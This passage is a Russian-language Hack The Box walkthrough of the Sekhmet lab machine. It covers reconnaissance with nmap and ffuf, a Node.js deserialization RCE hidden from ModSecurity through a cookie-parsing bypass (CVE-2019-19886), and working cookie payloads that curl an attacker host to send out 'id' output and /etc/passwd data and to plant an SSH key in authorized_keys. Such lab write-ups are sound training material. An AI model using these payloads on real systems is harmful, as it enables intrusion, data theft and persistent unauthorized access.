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Все это — в рамках прохождения тренировочной машины Sekhmet с площадки Hack The Box. Ее уровень сложности — «безумный».
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Первым делом добавляем IP-адрес машины в
/:
10.10.11.179 sekhmet.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Видим два открытых порта: 22 — служба OpenSSH 8.4p1 и 80 — веб‑сервер Nginx 1.18.0. При обращении к веб‑серверу сразу выполняется редирект на другой домен.
Добавляем его в файл
/ и снова обращаемся к сайту.
10.10.11.179 sekhmet.htb windcorp.htb
Точка входа
На сайте ничего интересного не находим. Но, учитывая, что мы нашли реальное доменное имя, есть смысл просканировать поддомены. Я это делаю с помощью сканера ffuf.
Справка: сканирование веба c ffuf
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch и DIRB.
Я предпочитаю легкий и очень быстрый ffuf. При запуске указываем следующие параметры:
-
-w— словарь (я использую словари из набора SecLists);
-
-t— количество потоков;
-
-u— URL;
-
-r— выполнять редиректы;
-
-fs— фильтровать страницы по размеру;
-
-fc— исключить из результата ответы с кодом 403.
Место перебора помечается словом FUZZ.
Получается вот такая команда:
ffuf -u 'http://windcorp.htb/' -H 'Host: FUZZ.windcorp.htb' -w subdomains-top1million-110000.txt -t 256 -fs 153
В итоге находим еще один сайт и добавляем его в файл
/.
10.10.11.179 sekhmet.htb windcorp.htb portal.windcorp.htb
Следующее действие при изучении сайта — поиск скрытых каталогов и страниц. Я снова попробовал использовать ffuf, но это не дало результатов, так как, скорее всего, проверяются заголовки. Чтобы не мучиться с ними, я стал сканировать при помощи Burp Intruder.
И снова ничего интересного. У нас осталась только форма авторизации, поэтому попробуем ее обойти. Насколько велико было мое удивление, когда получилось авторизоваться с логином и паролем
admin:!
Затем мое внимание привлекли cookie пользователя. Оказалось, что это закодированные в Base64 данные в формате JSON. В целом по виду cookie очень похоже, что используется Node.js. И мы можем утверждать, что на стороне сервера происходит десериализация и использование этих данных.
Попробуем поискать подходящие уязвимости. Я без труда нагуглил статью Exploiting Node.js deserialization bug for Remote Code Execution, где описано, как выявить и проэксплуатировать уязвимость при десериализации данных в Node.js. Я собрал и закодировал нагрузку, следуя рекомендациям из статьи, но мой запрос был заблокирован.
В тексте страницы находим упоминание ModSecurity, который и блокирует нам доступ.
Это очередное звено цепочки, продолжаем разбираться с сайтом и вникнем в Node.js более подробно.
Точка опоры
Node.js RCE + байпас ModSecurity
ModSecurity — это WAF с открытым исходным кодом. Именно ModSecurity не дает нам подобраться к приложению. Но иногда и в самих WAF находят уязвимости. Так, быстрый поиск в Google вывел меня на статью, где рассказано о CVE-2019-19886, позволяющей обойти ModSecurity. Удалось даже найти целый PoC для этой уязвимости. Ее смысл заключается в том, что мы используем ошибку в парсере ModSecurity и как бы прячем нагрузку, передавая Cookie
param=payload следующим образом:
param=payload=real_value
Тогда приложение распарсит куки как
param:, а WAF — как
param:, что позволит миновать фильтры.
Для эксплуатации RCE в Node.js нам нужно передать нагрузку через параметр
username в следующей конструкции:
{"username":"_$$ND_FUNC$$_function(){}()"}
Затем закодируем ее в Base64 и вставим в cookie как
profile=payload=value.
Первым делом откроем листенер
nc и попробуем выполнить запрос на свой сервер через curl:
{"username":"_$$ND_FUNC$$_function(){require("child_process").exec("curl http://10.10.14.29", function(error, stdout, stderr){});}()"}'
В итоге на наш листенер пришел запрос, а это значит, что мы добились RCE. Выполнить реверс‑шелл не получилось, поэтому попробуем записать ключ SSH. Нам нужно знать имя пользователя, которого мы используем для выполнения команд. Его можно эксфильтровать, закодировав в Base64 результат выполнения команды
id и вставив его как URI.
{"username":"_$$ND_FUNC$$_function(){ require("child_process").exec("curl http://10.10.14.29/$(id|base64 -w0)", function(error, stdout, stderr){});}()"}
Так мы получаем имя текущего пользователя. Теперь узнаем, имеет ли он доступ к командной оболочке, для чего получим запись из файла
/.
{"username":"_$$ND_FUNC$$_function(){ require("child_process").exec("curl http://10.10.14.29/$(cat /etc/passwd| grep webster|base64 -w0)", function(error, stdout, stderr){});}()"}
Пользователь имеет командную оболочку, теперь можем записывать ключ SSH. Для этого сгенерируем пару ключей с помощью ssh-keygen и запустим в каталоге с ключами веб‑сервер Python 3:
python3 -m http.server 80
Затем скачаем ключ и запишем в файл
authorized_keys.
{"username":"_$$ND_FUNC$$_function(){require("child_process").exec("curl http://10.10.14.29/id_rsa.pub > ~/.ssh/authorized_keys", function(error, stdout, stderr){});}()"}
Как только в логах веб‑сервера увидим обращение к публичному ключу, можно авторизоваться по SSH.
Продвижение WEBSERVER.windcorp.htb
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